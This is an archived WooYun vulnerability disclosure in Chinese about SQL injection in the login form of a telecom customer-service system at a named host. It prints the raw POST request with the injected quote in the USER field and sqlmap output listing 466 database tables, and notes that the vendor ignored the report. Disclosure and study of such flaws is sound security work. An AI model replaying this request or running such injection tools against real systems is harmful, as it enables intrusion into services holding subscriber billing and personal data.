乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
从支撑系统POST注入挖到463个表,多个库,涉及范围较大运营商躺枪大量用户躺枪,各种信息,消费详情外泄
POST / HTTP/1.1Host: kefu.tengkong.comContent-Length: 52Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://kefu.tengkong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://kefu.tengkong.com/Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=abc47UKMKy_e7_reBhgbvUSER=aaa%27&PASSWORD=aaa&Submit22=%B5%C7%C2%BC&ok=ok
Database: cmcc[466 tables]+-----------------------------------------+| BaoDaiMa_DemandServiceID || BaoDaiMa_SendLog || BaoDaiMa_SendQueue || BaoDaiMa_Simno || BaoDaiMa_SimnoServiceID || BookExtend_Statistic || CMCC_HaoDuan || CS_TellInput || CaiPiao_ChargeStatisticByDay1 || CaiPiao_ChargeStatisticByDay1 || CaiPiao_ChargeStatisticByDay2 || CaiPiao_ChargeStatisticByDay3 || CaiPiao_Friend || CaiPiao_InstructorConfig || CaiPiao_InstructorMap1 || CaiPiao_InstructorMap2 || CaiPiao_InstructorMap3 || CaiPiao_LotteryConfig || CaiPiao_SendLog || CaiPiao_Simno || CaiPiao_StatisticsDay_ByLotteryTrd1 || CaiPiao_StatisticsDay_ByLotteryTrd1 || CaiPiao_StatisticsDay_ByLotteryTrd2 || CaiPiao_StatisticsDay_ByLotteryTrd3 || CaiPiao_SysEntity || CaiPiao_TrdInfo || CaiPiao_UserInfo1 || CaiPiao_UserInfo1 || CaiPiao_UserInfo2 || CaiPiao_UserInfo3 || CaiPiao_UserLogin || CaiPiao_UserPower || ChargeMessage || Chat_ActionList || Chat_BlackList || Chat_ChatContent || Chat_CustomerRecieve || Chat_CustomerReply || Chat_FriendList || Chat_LoginUser || Chat_SID || Chat_UserInfo || CheckFlat_UserList || ChinaMobileCode_090820 || ChinaMobileCode_090820 || ChinaMobileCode_100926 || ChinaMobileCode_1010 || ChinaMobileCode_130820 || ConstellationFortune_BabyInfo || ConstellationFortune_DateInfo || CustmUpFiles || CustmWorker || CustomerInput || Data_HYSYZX_660061 || Data_SHHHLXY_660029 || Data_SHYHHS_660003 || Data_SHYM_66007714 || Day_qunfatongji || DetectTableChange || FTPTransfer_MaoBi_MO || FTPTransfer_MaoBi_MT || FTPTransfer_MaoBi_Province || FenZhongWebService_Log || FenZhongWebService_queue || Flux_NotBalance || HaoDuan_Area || IPPort || ListenNovel_booklist || ListenNovel_userbook || Log_ChongShangXing || Log_OrderedCharge || Log_TengkongWebMt || Log_TrdSyncOrderedUser || Log_sysfeedback_LastDay || LotterySimno_0709 || Lottery_ContentInfo || Lottery_LoginUser || Lottery_ServiceConfig || Lottery_UseLog || Lottery_UserInfo || MMSUnion_ContinueChargeQueue || MMSUnion_ContinueChargeUser || MMS_Statistic || MaoBi_logMO || MaoBi_logMT || MaoBi_logReport || MaoBi_queueMO || MaoBi_queueMT || MaoBi_queueReport || MeeCall_Error || MeeCall_User || Misc_Log_OrderedShouldDel || Misc_Log_Unsubscribe || Misc_OrderedShouldDel || Misc_Unsubscribe || Misc_log_SyncOrderRelationReq || Misc_ordereduser || Misc_syncOrderRelationReq || NeiZhi_StaticInfo || NeiZhi_UserLogin || Neizhi_BlackSection || Neizhi_MOLog || Neizhi_MOShieldLog || Neizhi_MOStatic || Neizhi_MTContentConfig || Neizhi_MTLimitConfig_20110916 || Neizhi_MTLimitConfig_20110916 || Neizhi_PartnerInfo || Neizhi_ServiceConfig_20120912 || Neizhi_ServiceConfig_20120912 || Neizhi_WhiteList || Neizhi_orderService || NetQin_ErrorLog || NetQin_ErrorLog || NetQin_Password || Netqin_Queue || Netqin_log || OA_Service || PGTV_User || ProcName_State || Push_AreaInfo || Push_PiciInfo || Push_UserLogin || Qunfa_ServName || ReceiveMessage_gtdSimno || SMS66002201BookExtend_Content || SMS66005001Extend_Config || SMS66005001Extend_User || SMS66005612Extend_Config || SMS66005612Extend_User || SMS66005616Extend_Config || SMS66005616Extend_User || SMS6600660BookExtend_Content || SMS6600777Extend_Config_bak || SMS6600777Extend_Config_bak || SMS6600777Extend_TurntableReturncontent || SMS6600777Extend_UserPoint || SMS6600777Extend_UserPoint || SMS6600778Extend_Config_temp || SMS6600778Extend_Config_temp || SMS6600778Extend_User || SMS6600789Extend_User || SMS66007Extend_Config || SMS66007Extend_User || SMSExtendSimno1 || SMSExtendSimno1 || SMSGuess_AllUser1 || SMSGuess_AllUser1 || SMSGuess_PassWord || SMSGuessqunfaUser || SMSOutExtend_ContinueChargeQueue || SMSOutExtend_ContinueChargeUser || SMSOutExtend_User || SMSUser_StatisticsDay_ByServiceArea || SMSUser_StatisticsDay_ServiceConfig || SMS_PushServiceConfig || SMS_PushStatics || SMS_RoleList || SMS_URLList || SMS_UserLogin || Silence_Queue || Silence_User || SubscribleServiceResp || SuoLun_User || SyncOrderRelationReq || THREAD_CONTROL || TrdPartyDataTransferConfig || TrdPartyDataTransferConfig || TrdPartyDataTransferURL || TrdSyncOrderedUser || TrdUsers || U_AD || U_Divination_Birthday || U_Divination_Constellation || U_Divination_UserInfo || U_EducatePaperAnswer || U_HBTV_Research || U_HNEnglishSchool || U_Happy52_User || U_LanLing || U_Log_sd_qlzq || U_SDInfor_Vote || U_SYDT_AllDirectionInterActive || U_SYDT_Car || U_SYDT_HappyWinner || U_SYDT_Information929 || U_SYDT_NewsClue || U_SYDT_dghd || U_SYDT_lawonline || U_SYDT_life || U_SYDT_photograph || U_SYDT_storyguess_UserInfor || U_SYTV_storyguess || U_SexChatRegInfo || U_ShunYi_DCJ || U_ShunYi_PSLB || U_ShunYi_SYZX || U_Suqian_Newspaper || U_TXY_Block || U_TXY_ChatContent || U_TXY_Info || U_TXY_Service || U_TXY_friends || U_TXY_recommend || U_TrdSimno || U_TrdSubmit_User || U_TrdSubmit_User || U_Weather_UserInfo || U_bjtv_zhongxinyuleyan || U_economyPaper || U_happydog_user || U_healthNewspaper || U_huaiheFood_Reporter || U_huaiheFood_VIP || U_humourNewspaper9 || U_humourNewspaper9 || U_log_SDInfor_Vote || U_lotteryorderedUser || U_northNewsPaper || U_ordereduser_20111103 || U_ordereduser_20111103 || U_ordereduser_20120417 || U_pigeon || U_replyword || U_sqtv_newspaper || U_xinghuozhize || U_yulequan_leaveword || UnSubscribleServiceResp || VIEW_ServiceInfoAdd || VIEW_ServiceInfoAdd || View_Kefu || View_MO || View_Mt || View_OSS || View_OU || View_OrderedUserFee || View_afterKefu || View_filmUnion_PartnerConfig || View_log_UserSubmit_SysfeedBack || View_log_radiostation || View_log_sysfeedback || WEB_BY_service || WEB_BY_user || WapExtendSimno || WapResource_User || XiZang_TV2_AnswerConfig || XiZang_TV2_User || XiZang_YSWH_JWUser || XinNuo_Content || YFCS_Extend_Content || YFCS_Extend_Statistic || YFCS_Extend_User || YNTV_RingLoad_InstructortoUserAgent || YNTV_RingLoad_RingNumMatch || YNTV_RingLoad_RingResource || YNTV_RingLoad_UserAgent || YPXG_City || YPXG_Income_Occupation || YPXG_Income_all || YPXG_Income_city || YPXG_Occupation || YPXG_UserInfo || b_Ad || b_OrderedTypeDsf_Config || b_TZJ_nsjk || b_TZJ_xlts || b_TZJ_ydrs || b_TZJ_ysmj || b_TrdMap || b_background || b_bySendInfo || b_caipiaoInfo_Config || b_cpWebFeeMessage_ContentConfig || b_cpWebfeemessage_PartnerConfig || b_dsfConfig || b_especiallyOrderedService || b_leaveWord || b_mixOrderServiceConfig || b_orderServiceReply || b_picAndRingUnion_Config || b_productsinfoAdd || b_productsinfoAdd || b_sidsetAdd || b_sidsetAdd || b_trdParty || black_user20120412 || blacklist_13419_1 || blacklist_13419_1 || blacklist_13419_2 || blacklist_20110516 || blackuser || bujunheng_content || bujunheng_simno || chinamobilecode_20121228 || chinamobilecode_guangdong || cmcc_log_statusreport1 || cmcc_log_statusreport1 || cmcc_log_sysfeedback1 || cmcc_log_sysfeedback1 || cmcc_log_sysfeedback3 || cmcc_log_sysfeedback4 || cmcc_log_sysfeedback5 || cs_Answer || cs_Input || cs_ProvinceArea || cs_Questions || cs_User || cs_freemessage || cs_partner || cs_replaceDestAddr || cs_tellModifyLog || custCreatepassword || diansong_config || dtproperties || duizhang_1404 || filmUnion_AllUser || filmUnion_BlackUser || filmUnion_ConfigModifyLog || filmUnion_ContinueChargeQueue || filmUnion_ContinueChargeUser || filmUnion_DetailFreeMessageUsers || filmUnion_DetailOrderedRateStatistic || filmUnion_OrderedRateStatistic || filmUnion_PartnerUser || filmUnion_RepeatChargeQueue || filmUnion_RepeatChargeUserLog || filmUnion_RepeatChargeUserLog || filmUnion_SSOLoginTempUser || filmUnion_SendEntityMessageProvince || filmUnion_ServiceConfig || flatdetect || fujian_20110926 || gdblacklist || heimingdan || ht_mobile || liaoning_hei_201311 || liaoning_heimingdan_201310 || log_FromWebUser || log_TrdPartyDataTransfer || log_UnionFreeMessageUsers || log_allunion || log_bysendLog || log_caipiaosendlog || log_filmUnion || log_gtdPicAndRing_allUser || log_mmsUnion || log_partnerDsfPasswordResp || log_ssoWEB || log_statusreport_1404 || log_statusreport_1404 || log_sysfeedback_1404 || log_sysfeedback_1404 || log_sysfeedback_statusreport || log_trdMo_bak || log_trdMo_bak || log_trdMt || log_trdReport || log_userFeeStatistic || log_usersubmit_1404 || log_usersubmit_1404 || mmsorder_test || neizhi_Province || neizhi_blacklist_20110318 || neizhi_blacklist_20110318 || neizhi_gskl_province || neizhi_wujuOrderContent || neizhi_wujuOrderInterface || neizhi_wujuOrderLog || oss_Account || oss_Answer || oss_Questions || oss_Role || oss_TypicalUser || oss_URLList || oss_URLList || oss_news || pb0410 || pb0508 || picAndRingUnion_BlackUser || picAndRingUnion_ContinueChargeQueue || picAndRingUnion_ContinueChargeUser || picAndRingUnion_Log_User || picAndRingUnion_Log_WapPush || picAndRingUnion_OrderedRateStatistict || picAndRingUnion_ServiceConfig || prefix_province || prefix_province || push_example || push_sms_0316_1 || pushadmin_AssociateLog || pushadmin_CheckLog || pushadmin_DayConfig || pushadmin_HourConfig || pushadmin_NotContentService || pushadmin_PreparativeSendConfig || pushadmin_PushLog || pushadmin_SendConfig || pushadmin_SendQueue || pushadmin_ServiceConfig || pushadmin_User || queue_MMSNotify || queue_OrderedSendbak || queue_allUnion || queue_filmUnion || queue_mmsUnion || queue_notification || queue_orderedsend_temp_1 || queue_orderedsend_temp_1 || queue_orderedsend_temp_1 || queue_orderedsend_temp_2 || queue_orderedsend_temp_3 || queue_orderedsend_temp_4 || queue_orderedsend_temp_5 || queue_orderedsend_temp_6 || queue_orderedsend_temp_7 || queue_partnerDsfPassword || queue_picAndRingUnion || queue_sysfeedback091124 || queue_sysfeedback091124 || queue_sysfeedback20070409 || queue_sysfeedback20070409 || queue_sysfeedback3 || queue_sysfeedback4 || queue_sysfeedback5 || queue_sysfeedback6 || queue_sysfeedbackbak || queue_trdMo_0619 || queue_trdMo_0619 || queue_trdmoqutong1 || queue_trdmoqutong1 || queue_trdreport1 || queue_trdreport2 || queue_trdreport_0619 || queue_trdreport_0619 || queue_usersubmit1 || queue_usersubmit1 || sendMsg_content || sendMsg_user || serviceid || sichuan_simno || sms_0316_3w || sysconstraints || syslog || sysmolog || syssegments || temp_0701_11 || temp_0701_11 || temp_anhui_201412_50000 || temp_anhui_201412_50000 || u_CooperateUser || u_SYDT_enjoyGuess || u_hn_gsOffice || u_sessionUser || u_sq_newscollect || u_unionChatUser || u_xizhangdtUser || view_filmUnion_ConfigModify_Log || yingjiacaipiao_SendLog || yingjiacaipiao_ServiceConfig || 吉林黑名单 || 山东182 || 山西屏蔽号码 || 河北7和8黑名单 || 浙江垃圾短信投诉用户号码 || 退费明细201410 || 需要屏蔽的黑名单 |+-----------------------------------------+[14:28:11] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 469 times[14:28:11] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\kefu.tengkong.com'[*] shutting down at 14:28:11C:\Python27\sqlmap>
当前库表
未能联系到厂商或者厂商积极拒绝
